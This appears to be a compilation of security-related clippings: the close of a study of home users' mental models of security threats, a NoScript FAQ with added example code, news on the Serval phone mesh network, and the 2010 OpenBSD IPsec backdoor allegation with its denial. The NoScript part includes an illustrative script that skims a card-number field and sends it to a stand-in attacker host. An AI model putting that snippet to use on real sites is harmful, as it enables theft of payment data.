Home computer users conceptualize security threats in multiple ways; consequently, users make different decisions based on their conceptualization. In my interviews, I found four distinct ways of thinking about malicious software as a security threat: the ‘viruses are bad,’ ‘buggy software,’ ‘viruses cause mischief,’ and ‘viruses support crime’ models. I also found four distinct ways of thinking about malicious computer users as a threat: thinking of malicious others as ‘graffiti artists,’ ‘burglars,’ ‘internet criminals who target big fish,’ and ‘contractors to organized crime.’ I did not use a generalizable sampling method. I am able to describe a number of different folk models, but I cannot estimate how prevalent each model is in the population. Such estimates would be useful in understanding nationwide vulnerability, but I leave them to future work. I also cannot say whether my list of folk models is exhaustive (there may be more models than I describe), but it does represent the opinions of a variety of home computer users. Indeed, the snowball sampling method increases the chances that I interviewed users with similar folk models despite the demographic heterogeneity of my sample. Previous literature [12, 15] was able to describe some basic security beliefs held by non-technical users; I provide structure to these findings by showing how home computer users group these beliefs into semi-coherent mental models. My primary contribution with this study is an understanding of why users strictly follow some security advice from computer security experts and ignore other advice. This illustrates one major problem with security education efforts: they do not adequately explain the threats that home computer users face; rather, they focus on practical, actionable advice. But without an understanding of threats, home computer users intentionally choose to ignore advice that they don’t believe will help them. Security education efforts should not only recommend what actions to take, but also emphasize why those actions are necessary. Following the advice of Kempton [19], security experts should not evaluate these folk models on the basis of correctness, but rather on how well they meet the needs of the folk who possess them. Likewise, when designing new security technologies, we should not attempt to force users into a more ‘correct’ mental model; rather, we should design technologies that encourage users with limited folk models to be more secure. Effective security technologies need to protect the user from attacks, but also expose potential threats to the user in a way the user understands, so that he or she is motivated to use the technology appropriately.

6. ACKNOWLEDGMENTS
I appreciate the many comments and help throughout the whole project from Jeff MacKie-Mason, Judy Olson, Mark Ackerman, and Brian Noble. Tiffany Vienot also helped me greatly in explaining my methodology clearly. This material is based upon work supported by the National Science Foundation under Grant No. CNS 0716196.

7. REFERENCES
[1] A. Adams and M. A. Sasse. Users are not the enemy. Communications of the ACM, 42(12):40–46, December 1999.
[2] R. Anderson. Why cryptosystems fail. In CCS ’93: Proceedings of the 1st ACM conference on Computer and communications security, pages 215–227. ACM Press, 1993.
[3] F. Asgharpour, D. Liu, and L. J. Camp. Mental models of computer security risks. In Workshop on the Economics of Information Security (WEIS), 2007.
[4] P. Bacher, T. Holz, M. Kotter, and G. Wicherski. Know your enemy: Tracking botnets. From the Honeynet Project, March 2005.
[5] P. Barford and V. Yegneswaran. An inside look at botnets. In Special Workshop on Malware Detection, Advances in Information Security. Springer-Verlag, 2006.
[6] J. L. Camp. Mental models of privacy and security. Available at http://papers.ssrn.com/sol3/papers.cfm?abstract_id=922735, August 2006.
[7] L. J. Camp and C. Wolfram. Pricing security. In Proceedings of the Information Survivability Workshop, 2000.
[8] A. Collins and D. Gentner. How people construct mental models. In D. Holland and N. Quinn, editors, Cultural Models in Language and Thought. Cambridge University Press, 1987.
[9] R. Contu and M. Cheung. Market share: Security market, worldwide 2008. Gartner Report: http://www.gartner.com/it/page.jsp?id=1031712, June 2009.
[10] L. F. Cranor. A framework for reasoning about the human in the loop. In Usability, Psychology, and Security Workshop. USENIX, 2008.
[11] R. D’Andrade. The Development of Cognitive Anthropology. Cambridge University Press, 2005.
[12] P. Dourish, R. Grinter, J. D. de la Flor, and M. Joseph. Security in the wild: User strategies for managing security as an everyday, practical problem. Personal and Ubiquitous Computing, 8(6):391–401, November 2004.
[13] D. M. Downs, I. Ademaj, and A. M. Schuck. Internet security: Who is leaving the ’virtual door’ open and why? First Monday, 14(1-5), January 2009.
[14] R. E. Grinter, W. K. Edwards, M. W. Newman, and N. Ducheneaut. The work to make a home network work. In Proceedings of the 9th European Conference on Computer Supported Cooperative Work (ECSCW ’05), pages 469–488, September 2005.
[15] J. Gross and M. B. Rosson. Looking for trouble: Understanding end user security management. In Symposium on Computer Human Interaction for the Management of Information Technology (CHIMIT), 2007.
[16] C. Herley. So long, and no thanks for all the externalities: The rational rejection of security advice by users. In Proceedings of the New Security Paradigms Workshop (NSPW), September 2009.
[17] P. Johnson-Laird, V. Girotto, and P. Legrenzi. Mental models: a gentle guide for outsiders. Available at http://www.si.umich.edu/ICOS/gentleintro.html, 1998.
[18] P. N. Johnson-Laird. Mental models in cognitive science. Cognitive Science: A Multidisciplinary Journal, 4(1):71–115, 1980.
[19] W. Kempton. Two theories of home heat control. Cognitive Science: A Multidisciplinary Journal, 10(1):75–90, 1986.
[20] A. J. Kuzel. Sampling in qualitative inquiry. In B. Crabtree and W. L. Miller, editors, Doing Qualitative Research, chapter 2, pages 31–44. Sage Publications, Inc., 1992.
[21] J. Markoff. Attack of the zombie computers is a growing threat, experts say. New York Times, January 7 2007.
[22] D. Medin, N. Ross, S. Atran, D. Cox, J. Coley, J. Proffitt, and S. Blok. Folkbiology of freshwater fish. Cognition, 99(3):237–273, April 2006.
[23] M. B. Miles and M. Huberman. Qualitative Data Analysis: An Expanded Sourcebook. Sage Publications, Inc., 2nd edition, 1994.
[24] A. J. Onwuegbuzie and N. L. Leech. Validity and qualitative research: An oxymoron? Quality and Quantity, 41:233–249, 2007.
[25] D. Russell, S. Card, P. Pirolli, and M. Stefik. The cost structure of sensemaking. In Proceedings of the INTERACT ’93 and CHI ’93 conference on Human factors in computing system, 1993.
[26] Trend Micro. Taxonomy of botnet threats. Whitepaper, November 2006.

APPENDIX
This appendix contains samples of data matrix displays that were developed during the data analysis phase of this project.

CONTACT
Rick Wash
http://www.rickwash.com
email : wash [at] msu [dot] edu

SEE ALSO: SCRIPTS
http://noscript.net/faq

Q: Why can I sometimes see about:blank and/or wyciwyg: entries? What scripts are causing this?
A:   about:blank is the common URL designating empty (newly created) web documents. A script can “live” there only if it has been injected (with document.write() or DOM manipulation, for instance) by another script which must have its own permissions to run. It usually happens when a master page creates (or statically contains) an empty sub-frame (automatically addressed as about:blank) and then populates it using scripting. Hence, if the master page is not allowed, no script can be placed inside the about:blank empty page and its “allowed” privileges will be void. Given the above, risks in keeping about:blank allowed should be very low, if any. Moreover, some Firefox extensions need it to be allowed for scripting in order to work. Sometimes, especially on partially allowed sites, you may also see a wyciwyg: entry. It stands for “What You Cache Is What You Get”, and identifies pages whose content is generated by JavaScript code through functions like document.write(). If you can see such an entry, you already allowed the script generating it, hence the above about:blank trust discussion applies to this situation as well.
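As an illustration of the master-page pattern this answer describes, here is a minimal, hypothetical page (all file names and text are invented for the example) in which a statically contained empty frame is addressed as about:blank and then populated by the master page's own script:

    <!DOCTYPE html>
    <html>
      <body>
        <!-- Statically contained empty frame: its URL is about:blank -->
        <iframe id="sub" src="about:blank"></iframe>
        <script>
          // This script runs with the master page's permissions. If the
          // master page is not allowed, this never executes, so nothing
          // can ever be injected into the about:blank frame.
          const doc = document.getElementById('sub').contentDocument;
          doc.open();
          doc.write('<p>Content injected into the about:blank frame</p>');
          doc.close();
        </script>
      </body>
    </html>

If the master page's script is blocked, the document.write() call never runs, which is why allowing about:blank by itself grants essentially nothing.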

Q: Why should I allow JavaScript, Java, Flash and plugin execution only for trusted sites?
A:   JavaScript, Java and Flash, even being very different technologies, do have one thing in common: they execute on your computer code coming from a remote site. All three implement some kind of sandbox model, limiting the activities remote code can perform: e.g., sandboxed code shouldn’t read/write your local hard disk nor interact with the underlying operating system or external applications. Even if the sandboxes were bulletproof (not the case, read below) and even if you or your operating system wrap the whole browser in another sandbox (e.g. IE7+ on Vista or Sandboxie), the mere ability of running sandboxed code inside the browser can be exploited for malicious purposes, e.g. to steal important information you store or enter on the web (credit card numbers, email credentials and so on) or to “impersonate” you, e.g. in fake financial transactions, launching “cloud” attacks like Cross Site Scripting (XSS) or CSRF, with no need for escaping your browser or gaining privileges higher than a normal web page. This alone is enough reason to allow scripting on trusted sites only. Moreover, many security exploits are aimed at achieving a “privilege escalation,” i.e. exploiting an implementation error of the sandbox to acquire greater privileges and perform nasty tasks like installing trojans, rootkits and keyloggers.
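As a hedged illustration of that last point, here is a sketch of what an injected script could do without ever escaping the sandbox. The form, the field name, and the collection domain are all invented for the example; the point is that every call in it is an ordinary, sandbox-permitted page operation:

    // Illustrative sketch only. Assumes the page contains a payment form
    // with a hypothetical #card-number field; attacker.invalid is invented.
    document.querySelector('form').addEventListener('submit', () => {
      const card = document.querySelector('#card-number').value;
      // An image fetch is a perfectly normal, sandbox-permitted network
      // request, so the stolen value rides out on an ordinary GET.
      new Image().src =
        'http://attacker.invalid/collect?d=' + encodeURIComponent(card);
    });

Nothing here reads the disk or escapes the browser; the data simply leaves as a normal image request, which is why "the sandbox held" is no comfort on an untrusted site.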

This kind of attack can target JavaScript, Java, Flash and other plugins as well:

  1. JavaScript looks like a very precious tool for bad guys: most of the fixed browser-exploitable vulnerabilities discovered to date were ineffective if JavaScript was disabled. Maybe the reason is that scripts are easier to test and search for holes, even if you’re a newbie hacker: everybody and his brother believes himself to be a JavaScript programmer :P
  2. Java has a better history, at least in its “standard” incarnation, the Sun JVM. There have been viruses written for the Microsoft JVM, though, like the ByteVerifier.Trojan. Anyway, the Java security model allows signed applets (applets whose integrity and origin are guaranteed by a digital certificate) to run with local privileges, i.e. just as if they were regular installed applications. This, combined with the fact that there are always users who, faced with a warning like “This applet is signed with a bad/fake certificate. You DON’T want to execute it! Are you so mad as to execute it anyway? [Never!] [Nope] [No] [Maybe]”, will search for, find and hit the “Yes” button, earned some bad reputation even for Firefox (notice that the article is quite lame, but as you can imagine it had much echo).
  3. Flash used to be considered relatively safe, but since its usage became so widespread, severe security flaws have been found at a higher rate. Flash applets have also been exploited to launch XSS attacks against the sites where they’re hosted.
  4. Other plugins are harder to exploit, because most of them don’t host a virtual machine like Java and Flash do, but they can still expose holes like buffer overruns that may execute arbitrary code when fed specially crafted content. Recently we have seen several of these plugin vulnerabilities, affecting Acrobat Reader, Quicktime, RealPlayer and other multimedia helpers.

Please notice that none of the aforementioned technologies is usually (95% of the time) affected by publicly known and still unpatched exploitable problems, but the point of NoScript is just this: preventing exploitation of even as-yet-unknown security holes, because when they are discovered it may be too late ;) The most effective way is disabling the potential threat on untrusted sites.

Q:  What is a trusted site?
A:  A “trusted site” is a site whose owner is well identifiable and reachable, so I have someone to sue if he hosts malicious code which damages or steals my data.* If a site qualifies as “trusted”, there’s no reason why I shouldn’t allow JavaScript, Java or Flash. If some content is annoying, I can disable it with AdBlock. What I’d like to stress here is that “trust” is not necessarily a technical matter. Many online banking sites require JavaScript and/or Java, even in contexts where these technologies are absolutely useless and abused: for more than 2 years I’ve been asking my bank to correct a very stupid JavaScript bug preventing login from working with Firefox. I worked around this bug writing an ad hoc bookmarklet, but I’m not sure the average Joe user could.

So, should I trust their mediocre programmers for my security? Anyway, if something nasty happens with my online bank account because it’s unsafe, I’ll sue them to death (or better, I’ll let the world know) until they refund me. So you may say “trust” equals “accountability”. If you’re more on the technical side and you want to examine the JavaScript source code before allowing, you can help yourself with JSView.

* You may ask: what if a site I really trust gets compromised? Will I get infected as well because I’ve got it in my whitelist, and end up having to sue as you said? No, you won’t, most probably. When a respectable site gets compromised, 99.9% of the time the malicious scripts are still hosted on a different domain which is likely not in your whitelist, and just get included by the pages you trust. Since NoScript blocks 3rd party scripts which have not been explicitly whitelisted themselves, you’re still safe, with the additional benefit of an early warning :)
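A toy model of the per-domain decision the footnote describes may help; this is an illustration of the idea, not NoScript's actual code, and the domains are invented:

    // Toy per-domain script whitelist: each script is judged by the
    // hostname of its own URL, not by the page that includes it.
    const whitelist = new Set(['trusted-shop.example']);

    function allowScript(srcUrl) {
      return whitelist.has(new URL(srcUrl).hostname);
    }

    // The trusted page's own script runs...
    console.log(allowScript('http://trusted-shop.example/app.js'));  // true
    // ...but a tag injected into that same page, pointing at another
    // domain, is still refused, since that domain was never whitelisted:
    console.log(allowScript('http://evil-cdn.invalid/payload.js'));  // false

This is why the compromised-but-trusted scenario usually fails: the attacker's payload is judged by its own hosting domain, which is not in your whitelist.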

http://www.servalproject.org/
http://gigaom.com/mobile/egypt-as-example-a-case-for-mesh-networks-on-phones/
How Phone-Powered Mesh Networks Could Help in Egypt
by Kevin C. Tofel / Feb. 1, 2011

Mobile broadband is arguably the most empowering technology currently driving the cloud, smartphone and app markets, but it’s simply not feasible to cover every square inch of the planet with a fast wireless connection. So how does one communicate with others in an area without any cellular coverage, or when governments order a shutdown of network services? The answer may lie within phones that create a direct relay system to transmit voice or data. This approach is called a mesh network: it enables a device to both receive and retransmit signals, much like a router does in a home wireless network. The video below from ABC News Adelaide shows the mesh network in action on basic Android handsets, with researchers communicating with each other by voice, even though there are no cellular towers in range.
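To make the relay idea concrete, here is a minimal sketch of phone-to-phone forwarding. The positions, the radio range, and the naive flooding scheme are all invented for illustration; real mesh protocols (routing tables, deduplication, audio codecs) are far more involved:

    // Toy sketch: a message hops phone-to-phone until it reaches a node
    // that can see a cell tower. All values are invented assumptions.
    const RANGE = 100; // assumed radio range in metres
    const phones = [
      { id: 'A', x: 0,   y: 0, seesTower: false },
      { id: 'B', x: 80,  y: 0, seesTower: false },
      { id: 'C', x: 160, y: 0, seesTower: true  }, // within tower coverage
    ];

    const inRange = (a, b) => Math.hypot(a.x - b.x, a.y - b.y) <= RANGE;

    // Naive flooding: each phone forwards a message it hasn't seen before.
    function send(from, msg, seen = new Set([from.id])) {
      if (from.seesTower) return msg + " delivered via " + from.id + "'s tower link";
      for (const next of phones) {
        if (seen.has(next.id) || !inRange(from, next)) continue;
        seen.add(next.id);
        const result = send(next, msg, seen);
        if (result) return result;
      }
      return null; // no route to any tower
    }

    console.log(send(phones[0], 'voice packet'));
    // Phone A is out of range of C, but B relays: A -> B -> C

Phone A cannot reach the tower-connected phone directly, yet the message still arrives because B retransmits it; that hop-by-hop relaying is the whole idea of a mesh.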

You can easily tell in the video spot that the voice quality is sub-par and therefore best suited for emergency communication in remote areas outside of traditional network coverage. But the peer-to-peer voice technology could improve as radios and software continue to evolve. The scenario reminds me of one of my first Skype calls back in 2004 (ironically, to someone in Australia): the call was filled with delays and echoes, but still usable. Just use Skype now to see how the technology has been refined and improved. While carriers control much of the handset experience and have little to no incentive to mature a communications technology that bypasses their networks, I’d like to see such mesh network research efforts continue. Think of the current situation in Egypt, where protests, tweets and phone calls have put the region front and center on the world stage and have caused the Egyptian government to effectively shut down Internet access in the country.

That’s just one step short of closing down cellular voice communications. In an extreme case such as that, phones that can enable direct communication through a handset relay system would enable families, emergency crews and others to avoid a total communications black-out. Data too could be routed through such mesh networks, ensuring that tweets and web services continue to flow. And while many voice and data networks are still separate today, the rise of 4G networks will eventually bring voice traffic over the web too, so any future Internet shut-downs could impact voice calls. Will mesh or peer-to-peer technologies completely replace traditional networks for voice, or data, for that matter? That’s highly unlikely due to many corporate, legal and technological challenges. But should such relay services and software solutions continue to be looked at as backup plans? I’d say yes, and I’m willing to bet a fair number of people in Egypt right now would agree.


Project Serval aims to enable communication anywhere, any time, without infrastructure, cell towers, or mobile carriers.

http://soundcloud.com/salimfadhley/pd_mesh1
http://www.informationweek.com/news/telecom/voip/showArticle.jhtml?articleID=229200136
Android Software Connects Calls Without Mobile Carriers
by Thomas Claburn / February 1, 2011

A university researcher in Australia has developed software that allows Android phones to make voice calls without the help of a mobile carrier. Paul Gardner-Stephen, a research fellow in the School of Computer Science, Engineering and Mathematics at Flinders University in Adelaide, Australia, has devised a technology that relays calls directly from one phone to another. The software will soon be available on the Serval Project Web site. It has two components: one creates a temporary, self-organizing, self-powered mobile network using phone towers dropped by air (as might be done in a crisis situation); the second supports a permanent mesh network that allows Wi-Fi enabled mobile phones, and eventually phones that connect via unlicensed frequencies (called Batphones), to communicate directly. “Phones running our software relay calls between themselves,” said Gardner-Stephen in a university news release. “If even just one of those can see a cell tower, then calls can be made with any of the phones, thus sustaining communications in affected areas. A balloon is not necessary; a phone running our software at any vantage point can suffice.”

Gardner-Stephen cites the recent flooding in parts of Australia, which disabled cell towers, as a use case for the technology. The ongoing communications blackout in Egypt represents another such scenario. Mesh networks are not a new concept, as can be seen from the Mesh Potato. Such projects seem to share a goal of providing phone service to under-served or poor communities. Gardner-Stephen says that any telephone carrier or handset maker can incorporate the Project Serval software and that the Project Serval team will be happy to help make that happen. The promise of the Serval Project may sound tempting to those who’d rather not pay hefty smartphone bills every month — “use your existing mobile phone number wherever you go, and never pay roaming charges again” — but it remains to be seen how keen mobile carriers will be to get paid less for phone calls or nothing at all. Add to that the difficulty of monitoring phone-to-phone communication, particularly if encryption is added, and it’s likely that control-oriented governments will look for ways to limit this kind of technology in the name of combating terrorism.

http://blip.tv/play/AYKf6TEC

http://www.computerworlduk.com/news/mobile-wireless/3258619/charities-and-ngos-express-interest-in-mobile-mesh-networking/
Charities and NGOs express interest in mobile mesh networking
Mobile communication without traditional infrastructure
by James Hutchinson / 29 January 11

A research project aimed at allowing mobile phones to communicate without traditional infrastructure has attracted phone manufacturers and not-for-profits looking to leverage the technology. Paul Gardner-Stephen, who co-founded the Serval project, first demonstrated the mesh network technology while experimenting with the use of Wi-Fi transmitters on phones to carry VoIP conversations. The makeshift network is capable of transmitting a few hundred metres, but could conceivably harness other phones and inexpensive Wi-Fi transmitters in the area to provide more coverage, even hundreds of kilometres away from a mobile phone tower. “We are actually carrying voice over that but in a way that doesn’t need to go back to a central repository anywhere,” Flinders University researcher Paul Gardner-Stephen told the ABC Local Radio program AM at the time.

Natural disasters
Initial expectations were that the experimental mobile technology would be used in cases of natural disaster, allowing rescue workers to communicate with each other and with head office, either by utilising each other’s mobile phones as transmitters or by deploying portable Wi-Fi transmitters by plane. Presenting at linux.conf.au 2011 this week, Gardner-Stephen said community response had already surpassed expectations, with the Australian Red Cross voicing enthusiasm at the possibilities. “They said during the Victorian bushfires, and I was flabbergasted when I heard this, they lost contact with crews for three days in the midst of the bushfires,” he said. “That’s one of the things that this technology can work to.” Gardner-Stephen said one phone manufacturer had also registered interest, though continuing talks with carriers about improving existing mobile infrastructure in rural areas had been unproductive. The Serval project has garnered $1000 in funding from The Awesome Foundation, while Gardner-Stephen gained a three-year fellowship with Flinders University, allowing him to work on the project full-time. The research project, which now counts seven people among its members, has continued to work on improving the technology, with plans to move away from data-heavy SIP voice protocols to an open source standard developed in-house.

The software is soon expected to work across all Android devices as well as iOS, Windows Mobile and other platforms, though the project is also looking to develop ‘Batphones’ that work over unlicensed frequencies rather than Wi-Fi. Gardner-Stephen used his presentation at linux.conf.au to provide the first public demonstration of the newly implemented PSTN gateway, allowing outbound calls from enabled devices to standard landline and mobile phones. Demonstrated on a “rooted” HTC Dream, or Google G1, the device called a mobile phone on a standard 3G network over Wi-Fi, while in airplane mode. A similar demonstration between two enabled devices operating over the mesh network wasn’t as successful. Later during the day, Gardner-Stephen performed another demonstration at the conference, launching a hot air balloon with Wi-Fi transmitter attached to provide greater coverage between mesh devices.

No threat to telcos
Serval’s attempt at creating a “best effort network” in areas without mobile coverage was not a threat to the existing telecommunications landscape, Gardner-Stephen said. “In actual fact, telcos are the ideal people to provide the interconnect between the local meshes,” he said. “Certainly for the first telco to partner with us, there’s actually some enormous dividends to be had. “We’re excited that this technology is not going to cost anyone a cent, there’s no reason why it can’t be put in every phone that’s physically capable of supporting it and that it can save lives, that it can save stress and duress in disasters. That it can connect the last two billion, and actually the last five billion, to the internet, because it’s all over IP.” Though Gardner-Stephen couldn’t confirm plans on IPv6 compatibility for the software, he said each of the phones connected to the mesh network would effectively share a single IPv4 address, with a unique subscriber identifier used to differentiate between devices. David Rowe, another presenter at the linux.conf.au 2011 conference, talked about the successes of a similar mesh-like telephone technology, Village Telco, in the East Timorese capital of Dili.

The FBI has been accused of planting a backdoor in the OpenBSD IPSEC stack ten years ago.

The code is a publicly available Open Source project, and the full history of commits is available for public review. After a week of worldwide code audits by various institutions, no evidence to this effect has yet been produced.

Whose logo do you trust more?  (OpenBSD on the left, FBI on the right)

http://en.wikipedia.org/wiki/IPsec
Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session.
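For orientation, the ESP framing at the heart of IPsec can be reduced to a short sketch (per RFC 4303). This is illustrative C written for this compilation, not code from any implementation discussed below:

    /* Sketch of IPsec ESP framing (RFC 4303). Illustrative only. */
    #include <stdio.h>
    #include <stdint.h>

    struct esp_header {
        uint32_t spi;   /* Security Parameters Index: selects keys/algorithms */
        uint32_t seq;   /* monotonically increasing anti-replay counter */
    };
    /* On the wire the header is followed by an IV, the encrypted payload,
       padding, a pad-length byte, a next-header byte, and the integrity
       check value (ICV) that authenticates the packet. */

    int main(void) {
        /* Every protected packet carries this 8-byte header in the clear,
           which is how the receiver finds the right Security Association. */
        printf("ESP header: %zu bytes\n", sizeof(struct esp_header));
        return 0;
    }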

WHO CARES?

The implication is that the FBI could have maintained the capability to eavesdrop on a majority of the world’s most secret digital communications.  The OpenBSD IPSEC stack sits at the lowest levels of most Open Source and proprietary network software and hardware, Free and Commercial alike.  IPSEC, being born of the IPv6 protocol suite, is required in any standards-compliant IPv6 implementation, yet optional for IPv4 (the protocol of the current internet).

The OpenBSD IPSEC stack is possibly the most widely used and most trusted piece of cryptographic network software.

Anyone who wants to may download the source code (including all historical commits) and contemplate this reality for themselves:
http://www.openbsd.org/cgi-bin/cvsweb/
http://www.openbsd.org/anoncvs.html

Not sure you trust the official sources?  Find a mirror which suits you:
http://www.openbsd.org/ftp.html

http://www.tcpipguide.com/free/t_IPSecModesTransportandTunnel-2.htm

Where is this code?  It is widely assumed that parts or all of the OpenBSD IPSEC stack can be found in:

http://en.wikipedia.org/wiki/IPsec#Software_implementations

– OpenBSD, with its own code derived from a BSD/OS implementation written by John Ioannidis and Angelos D. Keromytis in 1996.
– The KAME stack, which is included in Mac OS X, NetBSD and FreeBSD.
– “IPsec” in Cisco IOS Software
– “IPsec” in Microsoft Windows, including Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and later
– Authentec QuickSec toolkits
– IPsec in Solaris
– IBM AIX operating system
– IBM z/OS
– IPsec and IKE in HP-UX (HP-UX IPsec)
– The Linux IPsec stack written by Alexey Kuznetsov and David S. Miller.
– Openswan on Linux, FreeBSD and Mac OS X using the native Linux IPsec stack, or its own KLIPS stack.
– strongSwan on Linux, FreeBSD, Mac OS X, and Android using the native IPsec stack.


10 YEARS AGO IN CRYPTO HISTORY, SOME CONTEXT
(cryptographers and people with secrets were quite grumpy)

The cryptography and info-sec communities were reeling after several high-profile US faux pas:

1994, CALEA, Communications Assistance for Law Enforcement Act
“To amend title 18, United States Code, to make clear a telecommunications carrier’s duty to cooperate in the interception of communications for Law Enforcement purposes, and for other purposes.”
http://en.wikipedia.org/wiki/Communications_Assistance_for_Law_Enforcement_Act

1993 to 1996: The Clipper Chip initiative, a move to put hardware-chip backdoors in every electronic device, driven by a Presidential directive from US President Bill Clinton:
http://en.wikipedia.org/wiki/Clipper_chip

US Cryptography Export Issues:
Long story short: in cryptography, it’s best to have as many eyes as possible auditing cryptographic code and algorithms.  US crypto export restrictions became especially contentious/silly in the late 1990s:
http://en.wikipedia.org/wiki/Export_of_cryptography_in_the_United_States

TEMPEST operations, eavesdropping via electromagnetic emissions (particularly a hot topic in the 1990s, as declassified NSA work from the late 80s focused on using computer monitor emissions to eavesdrop on communications):
http://en.wikipedia.org/wiki/TEMPEST

Echelon, in operation from the Cold War onward; the European Parliament moved to publicly investigate it during 2001:
http://en.wikipedia.org/wiki/ECHELON

circa 1997-2005: Carnivore, a software system implemented by the FBI to monitor email and electronic communications:
http://en.wikipedia.org/wiki/Carnivore_(software)


<http://en.wikipedia.org/wiki/Openbsd>
Backdoor allegations

On 11 December 2010, Gregory Perry sent an email to Theo de Raadt alleging that the FBI had paid some OpenBSD ex-developers 10 years previously to insert backdoors into the OpenBSD Cryptographic Framework. De Raadt made the email public on 14 December by forwarding it to the openbsd-tech mailing list and suggested an audit of the IPsec codebase.[55][56] His response was skeptical of the report, and he invited all developers to independently review the relevant code. In the week that followed, no patches to that area of the code appeared. As time and code reviews go on without any backdoor being found, the allegation looks more and more like a hoax on Perry’s part.


THEO’S ORIGINAL POST
(OpenBSD Project Leader)
http://marc.info/?l=openbsd-tech&m=129236621626462&w=2

List:       openbsd-tech
Subject:    Allegations regarding OpenBSD IPSEC
From:       Theo de Raadt <deraadt () cvs ! openbsd ! org>
Date:       2010-12-14 22:24:39
Message-ID: 201012142224.oBEMOdWM031222 () cvs ! openbsd ! org

I have received a mail regarding the early development of the OpenBSD
IPSEC stack.  It is alleged that some ex-developers (and the company
they worked for) accepted US government money to put backdoors into
our network stack, in particular the IPSEC stack.  Around 2000-2001.

Since we had the first IPSEC stack available for free, large parts of
the code are now found in many other projects/products.  Over 10
years, the IPSEC code has gone through many changes and fixes, so it
is unclear what the true impact of these allegations are.

The mail came in privately from a person I have not talked to for
nearly 10 years.  I refuse to become part of such a conspiracy, and
will not be talking to Gregory Perry about this.  Therefore I am
making it public so that
(a) those who use the code can audit it for these problems,
(b) those that are angry at the story can take other actions,
(c) if it is not true, those who are being accused can defend themselves.

Of course I don’t like it when my private mail is forwarded.  However
the “little ethic” of a private mail being forwarded is much smaller
than the “big ethic” of government paying companies to pay open source
developers (a member of a community-of-friends) to insert
privacy-invading holes in software.

—-

From: Gregory Perry <Gregory.Perry@GoVirtual.tv>
To: “deraadt@openbsd.org” <deraadt@openbsd.org>
Subject: OpenBSD Crypto Framework
Thread-Topic: OpenBSD Crypto Framework
Thread-Index: AcuZjuF6cT4gcSmqQv+Fo3/+2m80eg==
Date: Sat, 11 Dec 2010 23:55:25 +0000
Message-ID: <8D3222F9EB68474DA381831A120B1023019AC034@mbx021-e2-nj-5.exch021.domain.local>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Status: RO

Hello Theo,

Long time no talk.  If you will recall, a while back I was the CTO at
NETSEC and arranged funding and donations for the OpenBSD Crypto
Framework.  At that same time I also did some consulting for the FBI,
for their GSA Technical Support Center, which was a cryptologic
reverse engineering project aimed at backdooring and implementing key
escrow mechanisms for smart card and other hardware-based computing
technologies.

My NDA with the FBI has recently expired, and I wanted to make you
aware of the fact that the FBI implemented a number of backdoors and
side channel key leaking mechanisms into the OCF, for the express
purpose of monitoring the site to site VPN encryption system
implemented by EOUSA, the parent organization to the FBI.  Jason
Wright and several other developers were responsible for those
backdoors, and you would be well advised to review any and all code
commits by Wright as well as the other developers he worked with
originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, they
more than likely caught wind of the fact that those backdoors were
present and didn’t want to create any derivative products based upon
the same.

This is also why several inside FBI folks have been recently
advocating the use of OpenBSD for VPN and firewalling implementations
in virtualized environments, for example Scott Lowe is a well
respected author in virtualization circles who also happens to be on
the FBI payroll, and who has also recently published several tutorials
for the use of OpenBSD VMs in enterprise VMware vSphere deployments.

Merry Christmas…

Gregory Perry
Chief Executive Officer
GoVirtual Education

“VMware Training Products & Services”

540-645-6955 x111 (local)
866-354-7369 x111 (toll free)
540-931-9099 (mobile)
877-648-0555 (fax)

http://www.facebook.com/GregoryVPerry
http://www.facebook.com/GoVirtual


INITIAL RESPONSE FROM ONE PARTY IMPLICATED
Jason Wright
http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

List:       openbsd-tech
Subject:    Re: Allegations regarding OpenBSD IPSEC
From:       “Jason L. Wright” <jason () thought ! net>
Date:       2010-12-15 18:27:31
Message-ID: 20101215182710.GA6897 () jason-wright ! cust ! arpnetworks ! com

Subject: Allegations regarding OpenBSD IPSEC

Every urban legend is made more real by the inclusion of real names,
dates, and times. Gregory Perry’s email falls into this category.  I
cannot fathom his motivation for writing such falsehood (delusions
of grandeur or a self-promotion attempt perhaps?)

I will state clearly that I did not add backdoors to the OpenBSD
operating system or the OpenBSD crypto framework (OCF). The code I
touched during that work relates mostly to device drivers to support
the framework. I don’t believe I ever touched isakmpd or photurisd
(userland key management programs), and I rarely touched the ipsec
internals (cryptodev and cryptosoft, yes).  However, I welcome an
audit of everything I committed to OpenBSD’s tree.

I demand an apology from Greg Perry (cc’d) for this accusation.  Do
not use my name to add credibility to your cloak and dagger fairy
tales.

I will point out that Greg did not even work at NETSEC while the OCF
development was going on.  Before January of 2000 Greg had left NETSEC.
The timeline for my involvement with IPSec can be clearly demonstrated
by looking at the revision history of:
src/sys/dev/pci/hifn7751.c (Dec 15, 1999)
src/sys/crypto/cryptosoft.c (March 2000)
The real work on OCF did not begin in earnest until February 2000.

Theo, a bit of warning would have been nice (an hour even… especially
since you had the allegations on Dec 11, 2010 and did not post them
until Dec 14, 2010).  The first notice I got was an email from a
friend at 6pm (MST) on Dec 14, 2010 with a link to the already posted
message.

So, keep my name out of the rumor mill.  It is a baseless accusation
the reason for which I cannot understand.

–Jason L. Wright

SOURCE CODE REFERENCES
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/pci/hifn7751.c
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/crypto/cryptosoft.c


Jason Wright, “Regarding Greg Perry’s baseless accusations”
http://thought.net/jason/

I have posted a message to tech@. I do not intend to add any more fuel to his baseless accusations. [posting]
http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

Publications

“Neural Network Architecture Selection Analysis With Application to Cryptography Location”
Jason L. Wright and Milos Manic. In Proceedings International Joint Conference on Neural Networks (IJCNN), July 2010, Barcelona, Spain. doi:10.1109/IJCNN.2010.5596315
http://dx.doi.org/10.1109/IJCNN.2010.5596315

“The Analysis of Dimensionality Reduction Techniques in Cryptographic Object Code Classification”
Jason L. Wright and Milos Manic. In Proceedings Conference on Human Systems Interaction (HSI), pp. 157-162, May 2010, Rzeszow, Poland. doi:10.1109/HSI.2010.5514572
http://thought.net/jason/cv/hsi10_submission_44.pdf
